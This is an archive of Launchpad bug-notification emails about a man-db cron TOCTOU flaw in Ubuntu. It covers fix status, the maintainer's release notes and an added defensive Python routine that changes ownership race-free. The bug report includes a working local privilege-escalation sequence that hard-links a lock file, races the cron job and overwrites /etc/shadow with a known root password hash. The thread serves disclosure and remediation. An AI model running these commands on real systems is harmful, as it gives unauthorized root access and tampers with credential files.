[Touch-packages] [Bug 1482786] Re: man-db daily cron job TOCTOU bug when processing catman pages

2022-11-09 Thread Benjamin Drung
The apport lock file permission was addressed in bug #1862348.

** Changed in: apport (Ubuntu)
   Status: Confirmed => Fix Released

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apport in Ubuntu.
https://bugs.launchpad.net/bugs/1482786

Title:
  man-db daily cron job TOCTOU bug when processing catman pages

Status in apport package in Ubuntu:
  Fix Released
Status in man-db package in Ubuntu:
  Fix Released
Status in pam package in Ubuntu:
  Confirmed
Status in shadow package in Ubuntu:
  Confirmed

Bug description:
  The daily mandb cleanup job for old catman pages changes the
  permissions of all non-man files to user man. The problematic code is:

  # expunge old catman pages which have not been read in a week
  if [ -d /var/cache/man ]; then
    cd /
    if ! dpkg-statoverride --list /var/cache/man >/dev/null 2>&1; then
      find /var/cache/man -ignore_readdir_race ! -user man -print0 | \
        xargs -r0 chown -f man || true
    fi
  ...

  By creating a hard link and winning the race, user man may escalate
  privileges to user root. See [1] for full explanation.

  man# mkdir -p /var/cache/man/etc
  man# ln /var/crash/.lock /var/cache/man/etc/shadow
  man# ./DirModifyInotify --Watch /var/cache/man/etc --WatchCount 0 --MovePath /var/cache/man/etc --LinkTarget /etc
  ... Wait till daily cronjob was run
  man# cp /etc/shadow .
  man# sed -r -e 's/^root:.*/root:$1$kKBXcycA$w.1NUJ77AuKcSYYrjLn9s1:15462:0:9:7:::/' /etc/shadow > x
  man# cat x > /etc/shadow; rm x
  man# su -s /bin/sh (password is 123)
  root# cat shadow > /etc/shadow; chown root /etc/shadow

  
  # lsb_release -rd
  Description:    Ubuntu 14.04.3 LTS
  Release:        14.04

  # apt-cache policy man-db
  man-db:
    Installed: 2.6.7.1-1ubuntu1
    Candidate: 2.6.7.1-1ubuntu1
    Version table:
   *** 2.6.7.1-1ubuntu1 0
          500 http://archive.ubuntu.com/ubuntu/ trusty-updates/main amd64 Packages
          100 /var/lib/dpkg/status
       2.6.7.1-1 0
          500 http://archive.ubuntu.com/ubuntu/ trusty/main amd64 Packages

  [1]
  http://www.halfdog.net/Security/2015/MandbSymlinkLocalRootPrivilegeEscalation/

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1482786/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp
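
The race in the cron snippet quoted in the bug description above exists because find prints a path and chown resolves that path again later. The added example below (not part of the original thread, and not the man-db fix) walks the tree through directory file descriptors instead, so a renamed or swapped directory cannot redirect the ownership change, and it refuses symlinks and hard-linked files. The names fix_owner_tree and build_demo_tree and the demo layout are assumptions made for illustration; it only reports unless apply=True.

```python
import os
import stat
import tempfile

# O_NOFOLLOW: never traverse a symlink in the final component.
# O_NONBLOCK: a FIFO swapped in after the lstat() cannot hang the job.
OPEN_FLAGS = os.O_RDONLY | os.O_NOFOLLOW | os.O_NONBLOCK


def fix_owner_tree(root, uid, apply=False):
    """Give stray entries under `root` to `uid` without re-resolving paths.

    Returns sorted (relative_path, action) pairs. With apply=False nothing
    is modified and "chown" means "would be chowned".
    """
    results = []
    root_fd = os.open(root, OPEN_FLAGS | os.O_DIRECTORY)
    try:
        _walk(root_fd, "", uid, apply, results)
    finally:
        os.close(root_fd)
    return sorted(results)


def _walk(dir_fd, prefix, uid, apply, results):
    for name in os.listdir(dir_fd):
        rel = os.path.join(prefix, name)
        try:
            pre = os.lstat(name, dir_fd=dir_fd)
        except FileNotFoundError:
            continue  # vanished: same tolerance as find -ignore_readdir_race
        if stat.S_ISLNK(pre.st_mode):
            results.append((rel, "skip:symlink"))
            continue
        if not (stat.S_ISREG(pre.st_mode) or stat.S_ISDIR(pre.st_mode)):
            results.append((rel, "skip:special"))
            continue
        try:
            # Opened relative to the directory fd we hold, not by full path.
            fd = os.open(name, OPEN_FLAGS, dir_fd=dir_fd)
        except OSError:
            results.append((rel, "skip:unopenable"))  # e.g. now a symlink
            continue
        try:
            results.append((rel, _handle(fd, rel, uid, apply, results)))
        finally:
            os.close(fd)


def _handle(fd, rel, uid, apply, results):
    st = os.fstat(fd)  # the object we hold, whatever the name points at now
    if stat.S_ISDIR(st.st_mode):
        _walk(fd, rel, uid, apply, results)
    elif not stat.S_ISREG(st.st_mode):
        return "skip:special"
    elif st.st_nlink > 1:
        return "skip:hardlink"  # the inode is also reachable under another name
    if st.st_uid == uid:
        return "ok"
    if apply:
        os.fchown(fd, uid, -1)  # acts on the inode just checked, not a path
    return "chown"


def build_demo_tree(base):
    """Constructed sample layout: one cache page, one hard link, one symlink."""
    root = os.path.join(base, "cache")
    outside = os.path.join(base, "outside")
    os.makedirs(os.path.join(root, "cat1"))
    os.makedirs(os.path.join(root, "etc"))
    os.makedirs(outside)
    for path in (os.path.join(root, "cat1", "page.gz"),
                 os.path.join(outside, "lock")):
        with open(path, "w"):
            pass
    os.link(os.path.join(outside, "lock"), os.path.join(root, "etc", "shadow"))
    os.symlink(outside, os.path.join(root, "swapped"))
    return root


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as base:
        # Dry run against a uid that owns nothing in the demo tree.
        for rel, action in fix_owner_tree(build_demo_tree(base), os.getuid() + 1):
            print(f"{action:16} {rel}")
```
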


[Touch-packages] [Bug 1482786] Re: man-db daily cron job TOCTOU bug when processing catman pages

2020-05-20 Thread Colin Watson
@serge-hallyn: The fix for the reported bug was entirely in man-db (see
comment #15), although it was a combination of upstream and packaging
work.  The apport, pam, and shadow tasks were spun off by @sarnold; the
pam/shadow tasks are explained in comment #2.



[Touch-packages] [Bug 1482786] Re: man-db daily cron job TOCTOU bug when processing catman pages

2020-05-19 Thread Serge Hallyn
@cjwatson - is it safe to assume the fix was entirely in man-db?  Or was
shadow supposed to do something here as well?



[Touch-packages] [Bug 1482786] Re: man-db daily cron job TOCTOU bug when processing catman pages

2018-08-27 Thread Chris Adams
Was the decision made not to backport this to 14.04 and 16.04 LTS?



[Touch-packages] [Bug 1482786] Re: man-db daily cron job TOCTOU bug when processing catman pages

2016-12-13 Thread Launchpad Bug Tracker
This bug was fixed in the package man-db - 2.7.6.1-1

---
man-db (2.7.6.1-1) unstable; urgency=medium

  * New upstream release:
    - Don't chmod CACHEDIR.TAG if it doesn't exist (closes: #847810).

 -- Colin Watson   Mon, 12 Dec 2016 12:51:57 +

** Changed in: man-db (Ubuntu)
   Status: Fix Committed => Fix Released



[Touch-packages] [Bug 1482786] Re: man-db daily cron job TOCTOU bug when processing catman pages

2016-12-11 Thread Colin Watson
Apologies for my long delay in dealing with these bugs, both reported by
halfdog.  Fixes turned out to be quite complicated, since in part they
involved unwinding incorrect logic from nearly 20 years ago and ensuring
that everything else built on that was appropriately adjusted.

Here are the relevant sections from my release announcement, which
should appear at
https://lists.nongnu.org/archive/html/man-db-announce/2016-12/msg0.html
in the near future:

  * SECURITY: Eliminate dangerous setgid-root directories.  In the default
    configuration, cache files and directories are now owned by man:man
    rather than man:root; man and mandb are now setgid man as well as
    setuid man (except in the --disable-setuid case).  This is a much
    simpler and safer solution to the original problem that caused my
    predecessor to make directories setgid root, and doesn't introduce any
    interesting new privilege since the man group's only real purpose is
    to be the man user's primary group and nothing in cache directories is
    group-writeable.

    Maintainers of distribution packagers should take care to review their
    installation rules in light of this change.

As far as I know this has no CVE ID, but it is described here:

http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/

  [...]

  Notes for distributors
  ======================

  The security fix above was quite involved.  If you're trying to backport
  it to a stable release, then you should probably consider at least these
  commits:

    e62b9edafe00c51e52863718cb2eb1e29385230e Rename some anomalous x* functions
    9ab9f3dd9b0d5f290c635995559332c1710e5b4d man(1): Fix gcc warnings
    0f8b5518949866075c25787bdc4e9c064597c21e Separate cache owner from --enable-setuid option
    94b9d1e2a14ce8790d7c73df00d0bbd9e40cd437 Handle cleanup stack more safely
    c7f7daa9b2ffbbf4c45a2b168802a51acc2263c0 Make --disable-cache-owner imply --disable-setuid
    31552334cecee82809059ec598a37d9ea82683f0 Eliminate dangerous setgid-root directories
    755a9551c45da82f99d0ad8e46ef756afbeafb3f Fix distcheck following cache-owner/setuid changes
    75701f7fd9a00108abeb851792231b3d9bc2a67d Fix systemd tmpfiles group/perms of /var/cache/man

  Feel free to contact me if you have difficulty.  You should also
  consider
  http://www.halfdog.net/Security/2015/MandbSymlinkLocalRootPrivilegeEscalation/,
  which could not be fixed without fixing the above bug first; while this
  bug was in Debian-specific cron jobs, others may have copied them.

I've uploaded 2.7.6-1 to unstable with fixes for these vulnerabilities.
I'd be happy to help out the Debian and Ubuntu security teams with
backports if they need it, although hopefully the above list of git
commits is enough to get started.

** Changed in: man-db (Ubuntu)
 Assignee: (unassigned) => Colin Watson (cjwatson)

** Changed in: man-db (Ubuntu)
   Importance: Medium => High

** Changed in: man-db (Ubuntu)
   Status: Confirmed => Fix Committed


[Touch-packages] [Bug 1482786] Re: man-db daily cron job TOCTOU bug when processing catman pages

2016-06-04 Thread Marc Deslauriers
** Changed in: apport (Ubuntu)
   Status: Fix Committed => Confirmed

** Changed in: man-db (Ubuntu)
   Status: Fix Committed => Confirmed

** Changed in: pam (Ubuntu)
   Status: Fix Committed => Confirmed

** Changed in: shadow (Ubuntu)
   Status: Fix Committed => Confirmed



[Touch-packages] [Bug 1482786] Re: man-db daily cron job TOCTOU bug when processing catman pages

2016-06-04 Thread jose
** Changed in: apport (Ubuntu)
   Status: Confirmed => Fix Committed

** Changed in: man-db (Ubuntu)
   Status: Confirmed => Fix Committed

** Changed in: pam (Ubuntu)
   Status: Confirmed => Fix Committed

** Changed in: shadow (Ubuntu)
   Status: Confirmed => Fix Committed



[Touch-packages] [Bug 1482786] Re: man-db daily cron job TOCTOU bug when processing catman pages

2016-02-01 Thread Mathew Hodson
** Changed in: man-db (Ubuntu)
   Importance: Undecided => Medium



[Touch-packages] [Bug 1482786] Re: man-db daily cron job TOCTOU bug when processing catman pages

2015-12-14 Thread Marc Deslauriers
** Information type changed from Private Security to Public Security
